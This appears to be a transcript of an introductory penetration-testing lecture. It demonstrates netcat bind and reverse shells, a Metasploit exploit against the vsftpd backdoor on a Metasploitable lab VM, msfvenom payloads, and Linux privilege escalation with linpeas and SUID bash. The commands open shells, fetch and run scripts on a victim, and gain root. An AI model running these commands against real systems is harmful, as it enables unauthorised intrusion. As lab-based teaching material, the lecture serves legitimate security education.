Welcome guys to the third class, I think, third class of intermediate session, intermediate track. In this class, we'll go through reverse shells, Metasploit, and maybe even we'll look out, even we'll maybe check out even OS enumeration and privilege escalation. Okay. So first thing, let's start with reverse shells. Reverse shells is basically, imagine this is an attacker machine and you have a victim machine. You got access to the victim machine using some exploit or something. After that, now you need the access of that victim machine on your attacker. Basically, you want a shell on your machine which controls the victim. To do that, we create a reverse shell between these two machines. Let's take an example. Maybe that'll be easier. Let's. I think I have it for a second. Correct. Imagine this as your victim machine. I took this from OneHub. In fact, this is what we did, I think, in last session, not last semester, for the advanced course. Yeah. So let that start. While that time, I have my Kali here. Okay. Okay, for now, let's just imagine here only, otherwise. Okay, so a reverse shell is when that's, I told you, right? You get the getting access of the victim on your attacker, but there are two types of it. Reverse shell is when you're listening on your attacker. You're listening in your attacker, and you send one, and the shell is bound from the victim to the attacker. Basically, you're listening for something, and the victim sends you a message to connect. That is reverse shell. But there's something the other way around, which is called bind shell. What that does is the listening will be happening on the victim itself. So basically, the command will go something like nc minus lvmp and minus e /bin/bash. /bash. What happens now is minus e, right? What was it? I think it is minus e. Let's work minus e, right? Let me take my Kali. Maybe my version of NC is from Nmap, which doesn't support the latest minus e, I think, but the other one should. Let's take that instead. So Kali here. So this is my attacker and this is the victim. Let's think like that. Okay. Yeah. So I'm listening here and here NC minus e should. It's not minus e. It's minus c. Minus h. Let me just check. What was it? Okay, minus c is to execute the command. Okay, minus c is working. Let's try minus c otherwise. NC minus L on port 3000 and minus C /bin/bash. Okay, so it is working. So what's happening here is we are basically listening for any signal on port 3000, and when that happens, the execution which will happen is /bin/bash. This is a bind shell and not this is what we call a bind shell and not a reverse shell, because the victim is basically giving this bin bash to anyone who listens. So I do an nc, what is this? Let's do an if config to check the IP address. 0 to 27 and port 3000, right? Okay, I think it's minus e only. Yeah, it was minus e. I don't know what error I did. And 027 and nc minus l. Okay, I'll do nc minus lvnp instead. Yeah, now finally. Sorry for that. So now what happens is I not only my attacker But imagine any other machine which is on this network can run the same command and get the shell, right? They can just netcat to this particular IP and the port, and they'll get the shell. This is the bind shell. What we'll be doing in reverse shell is similar but slightly different. Only thing is, this time we'll specify the client directly here in the victim itself. So the machine we need to get the reverse shell on is this machine, right? The attacker. So let's check the attacker's address. It's 10.02.15. So 10.02.15 port 3000 and -e/bin/bash. Just before I do that, I will listen for connections. -lbnp on port 3000. Yeah, so as soon as I hit enter, now I have a shell, and this is much more restricted, right? Only my machine has the shell. So now if I do an ls, I have the commands, and I can execute any other command here. So this is a reverse shell. Like this, there are many other ways to get a reverse shell. Well, obviously here it was easy because I have the victim's terminal also. But imagine, based on what you have learned from the previous sessions, right? You have learned now nmapping, after nmap, how using burp suite and getting credentials. Imagine instead of credentials, maybe something like SQL injection, you could run commands in the website which reflect on the terminal itself. So you don't have access to the victim except its website, maybe. So something like the victim machine we have now. So let's take our okay. So now in this case, this is the victim and the attacker remains the same. So we have the IP that's 10.02.12. So doing one basic nmap scan on that will show you all the ports in this particular VM. Yeah, there is SSH and that's HTTP. So this is usually the case which you have, right? We don't exactly have access to the victim. We just can enumerate the machine and see what all ports are open, and from there, move on. So let's see the HTTP. That's your website, right? Web server. So on your web server, let's go to 10.02.12, right? So blah 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 everything, and one thing they gave is the user on this box is OSCP. I've already done this, that's why I'll go through this because our main topic is still reverse shells. So imagine another website like this, but this version of this is the WordPress, right? Imagine the version of WordPress they were using is a really old one, and using some exploits, you should access this vulnerability of that particular version. I'll just clarify one thing before we started on Metasploit. Vulnerability is the weakness, right? For example, SQL injection is a vulnerability. The vulnerability there being the code that was made by the developer. He didn't do the string checking or input validation, stuff like that. What we did was we exploited using our own scripts, right? You did that union commands and dash for the commenting everything, the previous part of the SQL command, and adding your own commands. Similarly, like that, there are many more exploits available for, if the due to wrong misconfiguration of the software. It's a long process to check and find one exploits, right? Metasploit is one such tool which has a collection of many payloads which are ways to exploit the vulnerability and exploits themselves. So written code which we can use to get into the system. So the command to get into Metasploit is msf console. So yeah, that's an ASCII banner. So these are the different things we can do in Metasploit. There are exploits. Auxiliary means basically enumeration, which we do before we exploit something. Like for example, how many ports we got, right? But imagine we want to know how many subdomains are there and stuff like that. There are other tools for like GoBuster and whatnot, but Metasploit also hosts some more of its own auxiliary ports. Yeah, so post is for post exploitation, which will be basically OS enumeration and privilege escalation. We'll talk about this later. Then there are payloads. Payloads are more they're not restricted to any software or sort. They are more, based on which OS they are running or which kernel which is running, and based on that they just create a small exploit and encode it, or obfuscate it, meaning it is not in the same way. Like for example, we did the nc command, right? Imagine the victim machine did not allow us to it censors nc commands. It does run it, but we are not allowed to type nc as ASCII, plain ASCII in the code. So for doing that, payloads, they already make a executable, which we can now put it in the victim machine, and whenever it runs, we get a shell on our attacker machine. So that is payloads. Encoders are to evade like antivirus software. So now using payloads, we created a compiled C file, imagine, but it is not directly like it has some malware, segments of it, which is already identifiable by our antivirus or any firewall. To bypass that, we use encoders. NOPs are based on buffer overflow, which we'll be talking about in the next class, I think, on reverse engineering. Yeah, evasion techniques are much more devious way where we can implant the payloads. So we need to get the payload into the victim machine. So how do we do that? Using various evasion techniques. So that is the basic what all Metasploit offers us. So to see what all payloads and what all exploits are available in Metasploit, we just put show. Let's just see the help first, so that you guys can understand what all options are available in general. So yeah, you can change the banner. You can you also have a working shell in general. So actually, if I do ls, this is my current shell. It does an execution on the attacker's machine's current directory, and you can move into the other folders and stuff like that. But yeah, the main command to check is show. Where is show? Set. Okay, so let's do it search maybe first. Search is more helpful in the beginning. Yeah, search and show. Okay, these are the different modules. So each exploit or each payload are in something called modules. The modules are which under which all of this is contained, because most exploits have different ways to like different configuration files, right? Imagine one is a C exploit, one is a Python exploit, different programs, many different programming languages. But Metasploit, what it does is it converts all of them into modules, and all modules have like a basic formula, like basic commands, like what is already there. Yeah. So info, options, show options is you'll be seeing that now. Okay. So let's see some of the exploits that are available. If you just put show exploits, that should give you the list of all the exploits. Maybe I should not have done that. Yeah, there are 2000 exploits. Now it will basically load all 2000 of them. I should not have done that. Okay. So similarly, to check exploits, we did show exploits. Like that, we can also do show payloads, show NOP, and all of them. I'll just do show exploits. Hopefully it runs fast enough. Yeah, another way of show exploit will just show you all the exploits, right? But instead of that, I want to search for specific exploits. For example, imagine I'm using Chrome. The version of Chrome I'm using is a bit old, maybe 1-2 years old. That means there could be some exploits related to that. So to search that, we can do search exploit / Chrome, or just search Chrome. I think that works too. Still waiting for the show exploits command to execute. By that time, any doubts in reverse shells and bind shells in general? I mean, it's just a theory more like, yeah. I'm guessing no. Okay. Anyway, we got the different exploits available. As expected, there are 2096 of them. It won't be the same. The number might not be the same if you execute MSF console. You might have to update it. Other than that, it's the same. Only the number of exploits will change. The exploits and all these numbers will change. That's it. Everything else, the syntax or anything shouldn't change. And you might see MSF 5 instead of MSF 6. The latest version is 6 point something. Yeah, so as you can see, these are all the exploits available. So each are in different folders, the modules. So Linux, HTTP, and this particular software, Tiki Calendar. So these are all different softwares which have particular vulnerabilities. So you can see there's Nmap, WatchGuard, Citrix. There are different softwares. So to search them, search, like I said last time, we Chrome. Search Chrome. So these are all the modules related to Chrome. There are auxiliary modules, but Chrome as in not exact Chrome. As you can see, this is Chromecast. There's Google Chrome too. But the exploits are up. You can check when was this exploit released and patched and all that stuff. If you just Google this and see the CVE number. CVE number is the way to check whether is when the vulnerabilities are already like published. There are this is the way you can search for specific vulnerabilities. One famous vulnerability that recently was patched was sudo, I guess. Sudo has a huge vulnerability which was patched, I think, just a month ago, which allowed users to get a root shell if you just had sudo in it. I mean, not even if you didn't have access to it, not like just to sudo su or something. Yeah, so that's how you search for different modules in Metasploit. Yeah. So to use a module, let's take a live example instead. Okay. Okay, let's go to InfoSec when you talk about OS enumeration. I think now is not the right time. For Metasploit, Metasploit actually provides you a vulnerable VM, like how BWAP was used last time, right? Buggy web application by OSCP. This one is created by Rapid7. It's quite old. It's I think made in 2011 or something. So, excuse me. So Metasploitable has a lot of vulnerabilities which we can exploit using Metasploit. So that's what we'll be doing now. Let it start. That time, let's just, I need the IP of Metasploitable. That's it. The default credentials of Metasploitable are also available. If you just Google Metasploit, I think it's the link. Rapid7 is the company that made Metasploit. In fact, when you search for exploits, like for example, Chrome exploit, that's what we searched. Chrome exploit, if you do Rapid7, that would give you more Metasploit related Metasploit modules in general. And another famous website to check exploits is ExploitDB. ExploitDB will have a lot more than Metasploit. I'll tell you why later. But for now, let's focus on Rapid7. Yeah. So setting up Metasploitable, you power it on, and they even give the login credits. MSF admin, username, password. So MSF admin. The only reason I'm logging in is to just check the IP address. Otherwise, just imagine I have no access to this machine. Okay, 10.02.29. Cool. So now in my attacker, let me just do an nmap of that particular PC. 10.02.29, right? I'll do a little more detailed scan so that we get more we get a more detailed scans of that particular of all the ports that are available. Is to check different versions, the OS related commands and OS related information in the particular IP. Then ports is for all, -p is for all ports. So yeah, a good thing to do is to set up alias for these commands. That's what I usually do. For example, if I do my alias, yeah. This one see you can create an alias by just alias. Easiest way to do is to configure your .zsh. By aliasing, now you can save time when you type a command. So instead of doing nmap -sc -sv -a and all of that every time, if you do an alias, you can just do heavy scan and yeah, as you can see, I already had it. Heavy scan that following IP and save it somewhere. I already have it, so let's not waste time. Where is it? 0 day. Box. No. Meta. Yeah, I already have it. So okay, let me just close this. It's the same Metasploit machine. So if you do an Nmap scan on Metasploitable, you'll see a lot of ports open. Port 21 is open, port 22 is open, 23, 25, 53, 80. Excuse me again. Yeah, port 111, port 139. In most of your normal VMs, when you attack, you won't see this many ports, but since this is an extremely vulnerable machine made for that exact purpose, you see so many. So now, when you get Nmap scan like this, well, some ports you have to search manually. Like for example, port 80, and if there are another FTP servers, you'll have to manually log into them and see. Excuse me. So yeah, like that you can search for different exploits. So let's do that now. We have this VSF TPD version 2.3.4. This has to be relatively old. How do we know that? We just manually search through all of them. Luckily this is the first one, so I'm just doing that. So search that. Yeah, that's a direct VSF TPD backdoor command execution module available. So now we know there's a module available. So to use it, it's use. The command is use, then that particular module name. Just Control Shift C and Control Shift V. So yeah, now we have the exploit in. So to see what options are available for this exploit, we use show options. Yeah. So yeah, you can see all the different options. Usually you have to configure only two things: the R host, and if there's a L host, the L host too. R host is basically your victim machine, the machine you are trying to gain access, and L host is your attacker machine you are using to get access. Okay, so we'll set R host. R host would be the IP of this 10.02.15. Wait, was it 10.02.15? I don't think so. It was 10.02.29, I think. Yeah, 10.02.29. So set R hosts 10.02.29. Yeah, once it is set, just to show options again, now it should be set. Yeah, it is set. You don't need to change anything else unless specified. Here only even the payload option usually comes into play. Like for example, you already have a specific payload you injected into the victim machine. You also do set payload and payload name. Okay, that, and after that, to run the command, you can do run or exploit. Both do the same thing. So exploit and backdoor service has spawned. Handling UID is root. Oh, you directly have root access. So found shell, command shell, session 1 open. I think it is open already. So if I do an ls, so there you go. We have a shell ready. So id root, so cd/root. We have access. So root.txt. So cat root.txt, and yeah, if there was something important there, we could access it. Yeah, we can do all kinds of commands now. Yeah, this was a very easy easy box, so we didn't even have to do any enumeration or privilege escalation. Basically, we didn't have a user shell, we directly got the root shell itself. So we didn't have to climb our way to get better privileges for our user. So this was one way of doing it, and like this you can search through many other modules and many other exploits available in MSF. But the problem with MSF is creating these modules takes a lot of time, and that's the reason the number of exploits, even though 2000 seems like a lot, it's quite less as compared to the entire exploits available on the net right now. So for yeah, this is a much more guided approach where if you are confused on how to use the exploit or something like that, each module in MSF console works the same way. It's the show, it is the search, show options, and configure it and then run. That's it. You can also create payloads, and like I said before, a famous execution of that could be you can create a payload for your Android machine, and copy it there and wait for a shell in your Metasploit. Those shells are called meterpreter shells. Let's search meterpreter. So you can see there are different meterpreter shells available. One for Windows, one for Linux should be there. OS X also has one. Yeah, Android, even iOS has one. I didn't know that. Okay. So, and there are multiple ones. Multi usually means they are not related They're not just specified to one specific OS or kernel. It is available for all of them. Yeah, and once you create a payload, you just have to again run the particular exploit, or you just have the payload and you don't have any specific exploit in general. You just want to wait for the shell, like how we waited using the nc -l. Basically, you're waiting and listening. For the Metasploit shell, it's multi-handler. Multi-handler. Just wait, was that the one? Yeah, it's already done. Yeah, now show options and so here we don't have an R host, we have only the L host because we are only listening. We're just waiting for the R host to ping us and maybe get a shell. So we set L host and we just wait. To create these payloads, we can use Metasploit directly, but a better way to do is using MSF Venom. That is the software used to create payloads. So we do a -h. Yeah, so you can check the list for all modules, the different modules. Again, we have the same different informations available, like payloads, encoders, the NOPs, and we can specify the specific platform and stuff like that. So if we do MSF Venom -l payloads, that should give the list of all the payloads available in MSF Venom. Isn't much, and these both softwares are a bit dated now because the number of exploits and the number of payloads that are rejected now are a lot. So because of that, the systems have gotten better and we do have better exploits too. So this doesn't exactly this might not work on example Android 10 right now, the Metasploit shell. If you want to create and you just copy that in your machine and do it, it might not exactly. Maybe if you use Android 7 or 8, it might. I don't think it might work on Android 10. So that is there. So yeah, the code is right there. So -p, the payload name as seen from here, the listening host, same, the attacker VM, basically the IP address you put it in. -f is to specify the extension, then the output file name. That's it. And once you have it, you can send it to your Android device directly, maybe hosting small web server to do it, or you can just, I don't know, email it, or you can drag and drop it, or any other way. So that is Metasploit and reverse shells. But most of the boxes which you will encounter will not be so direct. It will not be just you find an exploit and you directly get the root shell. That's a much bigger process in middle. Like for example, once you do get an exploit and get a shell, you'll have to do something called OS enumeration and privilege escalation. OS enumeration is basically searching for different vulnerable applications once you're inside the shell. I will show a live example instead first. This time we'll use the infosec machine. That might be useful now. Okay. Also, any doubts until now? I think I'm going a bit too fast. If that's the case, please feel free to stop me and tell me to slow down. Okay. We wait for the machine to start. Okay, so the IP which we got is 10.02.12. So we can do a small Nmap. I think last time we did the Nmap and we got an SSH port and the website, right? And the website gave us we got the information that it has one user, I think. Right. So we have one user on the box, that is OSCP. So first thing you'll probably have to do is search for this website for different exploit. Maybe search the version of WordPress, inspect element, and maybe run a GoBuster and check what all other websites are available in this particular server. So I'll just jump everything and I'll just tell you where it is. It's in robots.txt. That's also the first place you should check anyway. So once you get to robots.txt, you have in disallow/secret.txt. You open the secret.txt, you have a particular cipher. Can anyone tell me what type of cipher this is? We went through this a lot already. Any idea? This should give away what type of cipher this is, right? Anyone? Yep, that's base64. So all we have to do is just decode it from base64 and see what is it. So let's go to 0-day box. Just open a subl base. Yeah, I already have it. I'll just run it again anyway. So yeah, that is the entire base64 file we got. Let's decode it. It's base64 -d, and let's copy it somewhere. Reason why I do the ID RSA is because once you decode it, you see it's a private key for an open SSH server. So what that means is it's a key which is available. We can use like for example, when you do an SSH, right? You don't need to always specify the password. You can use RSA keys, the public keys, the private keys to directly log in into the system. But just before you do that, you need to specify specific permissions to this ID file. The permissions to set is chmod 600. Basically, only root can access it, no one else, and ID RSA. Once you do that, it becomes an executable. Once you have the executable, now you can do an SSH into it. SSH -i ID_RSK OSCP, because in the website it was said that OSCP is the only user in the box. So that, press enter, and we have a shell. But the point is, if you do an ID, we are not root shell now. We are just the OSCP user. But I want a root shell. I want total access of this machine. That's when we have properly cracked the machine. So to get there, we'll have to check different files in this system. Maybe you can do a grep pass or something like that, and many other ways to enumerate. So there are different softwares already available to do this for us. Famous one is linpiece. So you search for linpiece. I think the first one. It's literally the first one. Yeah. So yeah, it's to get root access and basically move higher in the user privileges. So it will give you a list of all the vulnerabilities that are possible. It just searches the entire OS for different vulnerabilities and highlight it for you, and so that you can check it out. You can do this manually too. For that, we have there are lots of exploit privilege escalation methods. Like there's no one direct way to do it. It could be one software that's wrong, or it could be the kernel that is a bit old, or due to outdated software, or misconfiguration of files. It could be a lot of them. So to get there, we do have a lot of resources. Good resources would be Hacktricks, but not the shell. This also has a privilege escalation. Yeah, so they have different ways. Maybe you can check and get different exploits. So I forgot one thing. Yeah, I told how Metasploit is a bit old, right? But the newer method is searchsploit. I forgot to go through that. Yeah, sorry. Metasploit has the module method, right? Searchsploit doesn't have anything like that. For example, if I do the same Chrome search in Searchsploit, you will see there are a lot more now, a whole lot more. But the problem is, these are not your simple just do a show options and just exploit them. These are actual text files, JS scripts. Sometimes you have Python scripts, assembly code also. Sometimes you get RB, Ruby scripts. You'll have to go through them, understand them, and then execute them. To just go there, you can, I think it's -p, was it? Oh no, -j. Yeah, the path is user share exploit db, right? So to get the exact path of it, you just do what is it? Cat user share exploit db exploits, and whatever is the exploit path they give. Okay. So you go through your they give the description, what did they do and how did they exploit it, and you should basically try to reproduce it yourself, manually though. But you know how to do it, so it's easier instead of manually like searching and different scripts and everything. You know which script it is, you just need to execute it yourself. It's a bit harder than, I guess, Metasploit, but it gives you a lot more vulnerabilities than usual, because this is the exploit.db website itself. If you Google again, same Chrome exploit.db, you get similar results. You get the same results, but in the website, only difference is these web content. The content here is what we are getting directly in our system if you use Searchsploit. That is the software used, Searchsploit itself. Yeah. Okay, that was the small tangent I forgot. Anyway, yeah, we were in OS enumeration, right? Okay. That was lin piece. Okay, now this is the raw lin piece page. I don't need the raw lin piece page, I think. GitHub.com. Yeah. What you'll need to do is you'll just need to copy this file into your attacker machine. Since we already have a shell here, we have a shell for the victim, but we don't know what is there and everything. To do that only, we are doing this OS enumeration. So we go into a temporary folder where we might have write access. Some directories where you usually have write access always is /tmp or /dev/shm. This is a special property of dev/shm. I think you guys can find out. It's a cool thing about dev/shm. Do tell it out if you find it in the chat. There's something special about dev/shm as compared to temp or any other folder. Yeah, do check it what it is. Anyway, so we need to get the file here, right? So to get the file, lin piece. I just want the raw file. So using wget, I can copy this directly. Where do wget? And that. But sometimes you might not have internet access. So what do you do then? What you do then is in your attacker machine itself, which is your IP, right? Even though you have a shell on it, it still has a different IP and everything. This is where your network exists, right? Your packets are being sent from your attacker. So you go to 0-day or whichever folder you have the exploit. The lin piece. So I do the wget here first. I have the file right now. I need to copy this file from my my machine to the victim machine, because imagine here we are lucky, so the machine did have internet access, so it could do it. But most of the time you might not have internet access. You might just have a network access. Like these both are connected to the same NAT network, but they might not be exposed to the internet. So in that cases, you need to send this from your machine to the victim, right? You can use NC and various other stuff. Good way to do it is using web hosting. Like Python has a module called HTTP server, right? It's called simple HTTP server for that's the one, right? No, just have it in alias. Let me just check. I'm used to the it's Python simple HTTP server. Yeah, I think it's Python 3. It is just HTTP server. HTTP server, right? Nope. Anyway, so you can use this command to host the particular directory you're in. For example, now you are in home Kali 0-day, right? You wanna host a small you wanna host it on the local host. You just do that. You just do Python -m simple HTTP server, and that particular directory should now be accessible in that port. So if I do local host and port, which was specified as, I think default is 8000, so 8000 localhost port 8000. Oh, that's not localhost. Localhost. Yeah. So these are the contents of the particular the current directory I'm in, the a.c, a.out and all of that. But the point is we have lin piece. and if you click on it, you can download it. So similarly, now since we already know we have network access from the attacker to the victim, so you can just do a wget and the HTTP server name. So it is 10.0.2.15 port 8000 /linpiece.sh. Yep, it is saved. It's saved in .1 because I already have 2 of them now. Okay, so now since we have the linpiece in the victim, all you have to do is run it. Just make it an executable using chmod +x linpiece.sh. Now just ./linpiece.sh. So it will do the job. It will search for different vulnerabilities that are available. For example, it showed that sudo is vulnerable. I think that's due to the new vulnerability that is found. And LXD is a known vector which you might see a lot. It has a very detailed tutorial on how to do it. I think Hacking Articles has a very nice article on it. It's a bit complicated on how to do that. Using LXC, how do you get root privileges? Let me just see. I think it is Hacking Articles. Yeah. You have to copy a file online related to LXC, then you have to dump it in the attack victim. You just need to follow this. If you follow it, you will get a root shell. This is one more vector, but that's not the way we'll do it for this machine. Oh yeah, before I do that, these are the different colors, your schemes, which is important for us. Red or yellow means 95% penetration vector. Red might be interesting, and the ones with console and stuff like that. All of these are important legends for us. Using that, we just scroll through and see, is it a virtual machine? Yes, it is, because I'm hosting it. I'll just go through the red or yellow ones first, the highlighted ones, because I know it should be somewhere here already. Yeah, not this one. I'll do the keep searching, and yeah, there's something on bash. Bash for some reason is highlighted, so we need to check what is wrong with bash. We can do what is wrong with sudo too, but sudo one is a relatively new exploit, so I'll not go through that. We'll just search for bash. So we know bash has some special status. In fact, if I let into that a bit more closer, this is something called SUIDs. SUIDs is when these are root accessible, like root readable executables. That means even though I execute as a user, the current user I am, I think OSCP, right? But if I run that command, that will run it as root. So it's kind of like doing it as sudo, even though I don't have sudo permissions, right? Like that. So using that particular exploit, using SUID exploitation, we can get access. How do we get the access? How do we get what is the SUID exploit for bash itself? To check that, there's another good website, that is GTFO-bins. So GTFO-bins, now if you find a binary which has an SUID or some extra privileges than normal, you can check here what all can you do with it. For example, now we got bash, right? Bash. So using bash, if you have a little more higher privileges or there's something wrong with bash for the attacker, for the victim, you can see we have different options we can exploit. So we'll be using the SUID vulnerability. So for the SUID, so if the SUID is set, it does not drop the elevated privileges and might be abused to get the file system, escalate or maintain privilege access as SUID backdoor. So we'll be trying to get a privileged access. So the command, we don't need to install it because it's already installed. We just need to do bash -p. So -p is the parameter that gives us the access. Why is that? We can check it out. Bash -minus helper. So before that, let's do the execution itself. -p is what they said. So if I execute bash -p, you will see the shell has no change. It's we do an ID. EUID is root. That means effectively I'm still root. I have root access, so I can go into cd/root and stuff like that. I have access to the root machine. So technically this box is cracked. So this is the way you enumerate and get the privileged access in Linux. Similarly, like Linux, there is a way to get it in Windows too. That is the Win piece, and there's PSPY to check the current processes that's running. Like for example, linpiece can show us what are the binaries that are running that are exploitable, or the different. It doesn't only stop at binaries, by the way. It just, like for example, you can see it search for different passwords that might be available, and yeah, there is a passwords, maybe some admin logins that were lost and stuff like that. But imagine the current processes that is running, and there's some cron job running. Like, cron is the command which runs different scripts at your convenient time. If, for example, you want a command to run every day at 5 o'clock or every week at 10 o'clock, that's what cron does. For example, there's a cron job running right now at it'll execute bash and give you a root shell at 5 p.m. every day. You might not find that in linpiece. To check that, you have the PSPY. That also works a similar way. You need to get the exploit.sh to your PC and run it out. Yeah, you have to build it and run it in there. It's a bit more complicated and a bit more advanced, but most of the time, linpiece will get the job done. And if it is Windows, it's WinPiece. I think it's in the same directory too. In the same repo, it should be there. Yeah, there it is, WinPiece. WinPiece, there's an executable and a .batch file. There's a batch file also available. So use one and try to get root access. At least check what all vulnerabilities might be available for you to exploit. So yeah, that is OS enumeration and privilege escalation. So now that technically you got everything right, you learned Nmap and burp suite to now search all the ports in a particular VM. Then once you have the ports, access those ports, and if it's a website, different exploits. You can intercept message using burp suite. You can check if it's an SQL injection using the SQL injection tools. We have SQL map and stuff like that, and find an exploit. And once you get an exploit, you can use it to get a reverse shell, as we saw in using maybe Metasploit or Searchploit exploits. And once you get a shell, your job is not still done. You need to enumerate the OS and search for different other vulnerabilities available and use it to get the root shell. With this, actually, you can you have finished a basic pen test course technically. You have all the tools accessible to you to do this now. So with that, this week's assignment will be related to this again. So you guys have to now crack a box. The easiest, there'll be two boxes. One will be a resource for you guys to just maybe check out if you're still if I missed something or you didn't understand some other topics. A good box is Kenobi. What is it? Free box, easy. Yeah, this box, Kenobi box. This box is a much more guided experience. It will tell you what to do to enumerate Samba here. Samba is to file share. That's after you get the port, and once you get it, how do you get a shell on it? Once you get the shell, how do you use see again the SUIDs come here too. Once you use the SUID, how do you get the root shell? And you just need to paste the root flag there. So this is not an assignment though. This is just for you to check to understand the entire process. If it is just a revision for you guys kind of way. The box you'll have to do is Mr. Robot. Shit, I should have done that too. Where's Mr. Robot? I'll just search for it. Yeah, there it is. Mr. Robot CTF. It is a bit challenging for sure. You'll have to use your password cracking skills too, which you learned, and try to get the root shell. This is not guided as like that. You'll just have 3 keys. You need to find all 3 keys and submit the write-up to in Edmodo. This is your assignment. In TryHackMe, the box is available. Do it and hack it and get it. The same box is also available in OneHub if TryHackMe is giving you issues. It's the same thing. Both are the same box. OneHub, Mr. Robot. OneHub will give you an OVA file which you'll have to import and run it. The same though. Same 3 keys are there. You'll have to find the 3 keys and get the 3 flags. Yeah. this is your this week's assignment. Yeah, one thing you did SUID and LXC also. Sudo -l you can run that if you have access to the bash shell and have the password, because sudo -l will ask you for the password. What it does is it gives you what other commands are run, it could be run as sudo. For example, even though imagine the user I am is Kali, normal user, not the root user. Imagine some commands I do have sudo permissions. For example, maybe I have sudo, I can run sudo on ifconfig, but not anything else, only ifconfig. So like that there might be different commands available, so you can search for all those commands using sudo -l, and once you find them, you can maybe using gtfo bins find a way to use it to get root shell, or if it's a custom binary, you'll have to probably reverse that particular binary and get access. The reversing will be taught in the next class. Yeah, I think we covered everything. These are some resources that you guys could use for reverse shell. This is the one. Yeah, for linpiece, for OS enumeration and privilege escalation, the linpiece file and the what is it? The Hacktrix, I think, right? Hacktrix was it? Yeah, Hacktrix privilege escalation is a good read. You can, there are a lot available. In fact, Hacktrix in general is a amazing website you can check out to get not just the Linux privilegation, the privilege escalation. There are a lot more cheat sheets and search experts available. Do check that out. Yeah, so this Hacktrix, yeah, this one. Linpiece, the yeah, then what else? Yeah, GTFO bits, of course. Yeah, this is fine. These three should be good enough for you guys to get the shell in those two machines. And yeah, any other doubts, guys? Because that's it. This class is done. You've done through all the modules required. Yeah, the assignment, as I said, is just the Mr. Robot box in try hack.